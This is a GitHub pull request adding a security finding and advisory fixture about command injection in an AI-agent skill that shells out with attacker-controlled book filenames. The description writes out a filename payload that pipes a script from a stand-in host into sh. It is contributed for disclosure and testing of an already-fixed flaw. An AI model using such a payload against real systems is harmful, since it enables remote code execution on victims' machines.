Add finding: OS command injection in an AI-agent skill (zlibrary-to-notebooklm, CWE-78)#122
Conversation
…otebooklm) A community-contributed, real-world finding in SEC-AF's verdict/trace/evidence format, demonstrating the OS command-injection class (CWE-78) in AI-agent skills. The vulnerable project is an MIT-licensed agent "skill" that auto-downloads a book from Z-Library and shells out to the NotebookLM CLI. `download.suggested_filename` (attacker-controllable) flows into f-strings run with subprocess.run(..., shell=True) at 7 sinks -> RCE via a crafted book filename. Already remediated (list-argv, shell=False); included as an example/fixture, not a live 0-day. Files: - exampl/zlibrary-to-notebooklm-command-injection.finding.json (SEC-AF finding schema) - exampl/zlibrary-to-notebooklm-command-injection.md (readable advisory)
|
|
There was a problem hiding this comment.
💡 Codex Review
Here are some automated review suggestions for this pull request.
Reviewed commit: 361dda2943
ℹ️ About Codex in GitHub
Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you
- Open a pull request for review
- Mark a draft as ready
- Comment "@codex review".
If Codex has suggestions, it will comment; otherwise it will react with 👍.
Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".
…ifiedFinding The fixture is advertised as a SEC-AF finding, so consumers must be able to load it with sec_af.schemas.prove.VerifiedFinding. It previously omitted required fields and carried non-schema-shaped nested objects, so VerifiedFinding.model_validate(...) would reject it: - top-level: add required rationale, sarif_rule_id, sarif_security_severity (+ tags) - proof: add required exploit_hypothesis, verification_method, evidence_level; fold the non-schema exploit_scenario into exploit_hypothesis and map the payload/outcome onto Proof.exploit_payload / Proof.expected_outcome; data_flow_evidence already matched DataFlowEvidence - remediation: reshape to RemediationSuggestion (fix_description, patch_diff, confidence) from the prior non-schema summary/before/after/status/notes - compliance/location were already schema-valid Add tests/test_example_findings.py: parametrized over exampl/*.finding.json, asserts each loads via VerifiedFinding.model_validate and that proof/ remediation, when present, are fully-formed. Guards every example finding, current and future, against schema drift. Validated locally (pydantic 2.12.5; 2 passed). Co-Authored-By: Claude Opus 4.8 <noreply@anthropic.com>
There was a problem hiding this comment.
💡 Codex Review
Here are some automated review suggestions for this pull request.
Reviewed commit: c3c2041228
ℹ️ About Codex in GitHub
Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you
- Open a pull request for review
- Mark a draft as ready
- Comment "@codex review".
If Codex has suggestions, it will comment; otherwise it will react with 👍.
Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".
…engine The committed example understated the same finding the platform would emit. SEC-AF's own scoring (sec_af.scoring) floors CWE-78 to critical and recomputes exploitability_score = severity x evidence x reachability x chain, mirroring the result into sarif_security_severity (orchestrator.py:383-385). For this confirmed, level-5 RCE whose taint source is a remote attacker- controlled filename, the engine produces: critical (10.0) x EXPLOIT_SCENARIO_ VALIDATED (0.9) x externally_reachable (1.0) x no-chain (1.0) = 9.0. - severity: high -> critical - exploitability_score: 3.0 -> 9.0 - sarif_security_severity: 8.8 -> 9.0 (mirrors exploitability_score) - tags: + externally_reachable (the honest reachability bucket - taint enters from a remote, unauthenticated source; without it the engine's non-empty-tag fallback would score 4.5, still understating a confirmed RCE) - rationale + companion .md updated to match Strengthen tests/test_example_findings.py with test_example_finding_agrees_with_platform_scoring: re-runs the engine's floor + score pass over every fixture and asserts the stored values equal the recomputation, so an example can never again silently disagree with the platform. Verified locally: 3 passed (engine recomputes severity=critical, score=9.0). Co-Authored-By: Claude Opus 4.8 <noreply@anthropic.com>
What
A community-contributed, real-world finding in SEC-AF's verdict → trace → evidence format, added under
exampl/:exampl/zlibrary-to-notebooklm-command-injection.finding.json— structured finding (SEC-AF finding schema:cwe_id,evidence_level,proof.data_flow_evidence.steps,compliance,remediation…)exampl/zlibrary-to-notebooklm-command-injection.md— readable advisoryWhy it fits SEC-AF
It demonstrates exactly the class SEC-AF is built to prove: an OS command injection (CWE-78) in an AI-agent skill. The vulnerable project is an MIT-licensed agent "skill" (
zlibrary-to-notebooklm) that auto-downloads a book from Z-Library and shells out to the NotebookLM CLI.Confirmed data flow:
download.suggested_filename(attacker-controllable — the book uploader sets it) →download_path→title/file_path→ f-strings →subprocess.run(..., shell=True)at 7 sinks (1 inconvert_to_txt, 6 inupload_to_notebooklm). A book named'; curl https://evil.example/x.sh | sh; '.epubyields RCE when the skill processes it. The wrapping single-quotes are not a defence.Responsible disclosure
The finding is already remediated — all seven sinks refactored to list-argv with
shell=False, preserving behaviour (verifiedpy_compile+ zeroshell=True). It is contributed as an example/fixture with the fix included, not a live 0-day.Verdict
confirmed· severity high · evidence level 5 · CWE-78 · OWASP A03:2021.